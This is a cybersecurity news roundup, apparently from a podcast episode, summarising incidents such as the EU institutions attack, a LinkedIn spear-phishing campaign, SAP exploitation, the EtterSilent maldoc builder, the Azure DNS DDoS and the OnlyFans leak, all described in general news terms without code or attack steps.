European Union institutions targeted in a cyber-attack
The attack, which occurred last week, affected a range of European Union institutions including the European Commission, which confirmed that a number of EU bodies “experienced an IT security incident in their IT infrastructure.” Forensic analysis of the incident is still in its initial phase, with no conclusive information about the nature of the attack currently available, however, a representative stated that, “Thus far, no major information breach was detected.” The attack was serious enough for senior officials at the commission to be alerted, given that it was bigger than the usual attacks that regularly hit the EU.
LinkedIn spearphishing campaign uses custom decoy job offers
A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The phish generates malicious ZIP archive files that mimic the name of the victims’ job titles taken from their LinkedIn profiles. If a LinkedIn member’s job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position. Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the more_eggs trojan. With the COVID pandemic contributing to job losses, this phish takes advantage of job seekers who are desperate to find employment.
Ransomware attacks increased by 485% in 2020 over 2019
This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: Two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices made up 96% of all detected vulnerabilities, while a 335% surge in Smart TV vulnerabilities occurred compared to 2019. In social engineering, Android was especially heavily targeted, experiencing a 32% growth, specifically in impersonating video conferencing software and COVID-related medical apps. In addition, a 189% year-on-year increase in vulnerabilities in network-attached storage (NAS) devices was observed.
On-premises SAP systems targeted within hours after release of security patches
SAP, working with CISA, and cybersecurity firms Onapsis and BSI are warning SAP customers to install security updates once they become available and to assess their on-premises installs. Threat actors are attacking mission-critical SAP applications directly targeting sensitive data, seeking to modify configurations and exfiltrate sensitive business information. The report states SAP vulnerabilities being weaponized in less than 72 hours since the release of patches, and new unprotected SAP applications provisioned in cloud (IaaS) environments being discovered and compromised in less than three hours.” It adds that these threats may also have regulatory compliance implications for organizations that have not properly secured their SAP applications processing regulated data.
Thanks to our episode sponsor, Sotero
EtterSilent maldoc builder used by top cybercriminal gang
A malicious document builder named EtterSilent is gaining more attention on underground forums with ads boasting features like bypassing Windows Defender, Windows AMSI (Antimalware Scan Interface), and popular email services, including Gmail. An EtterSilent maldoc with macro code can pose as a DocuSign or DigiCert document that asks users to enable support for macros that download a payload in the background. The maldoc then leverages Excel 4.0 macros stored in a hidden sheet, which allow an externally-hosted payload to be downloaded, written to disk and executed. From there, attackers can follow up and drop other assorted malware.
Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDOS
Following up on a story we brought you on Monday, Microsoft has confirmed its April 1 outage was due to an anomalous surge of DNS queries from all over the world that was targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not reveal who was responsible for the attack whose success was unusual for such a large and well-defended target as Azure, but stated, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”
Industrial Control Systems are becoming a favorite target for threat actors
A new report from Kaspersky confirms that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the more famous examples, the China-linked group RedEcho targeting the Indian power sector and an unidentified cybercriminal attempting to poison a Florida city’s water supply and treatment plant, the report states that the attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.
Adult content from hundreds of OnlyFans creators leaked online
OnlyFans is a website that allows content creators to earn money by sharing images, videos, and live streams with fans who pay to subscribe to their content. While it is promoted as a way for celebrities and social influencers to share their content, it is also heavily used to share adult-themed content with fans who pay to access it. Last month, researchers at cybersecurity firm BackChannel found a post on a hacking forum where a member shared a Google Drive that contained folders for 279 OnlyFans creators, with one having over 10GB of videos and photos. BackChannel has created an ‘OnlyFans Lookup Tool’ web page that allows OnlyFans creators to input their member-name and determine if their content has been shared without permission, at which point they must report individual files for copyright infringement to remove them from Google Drive.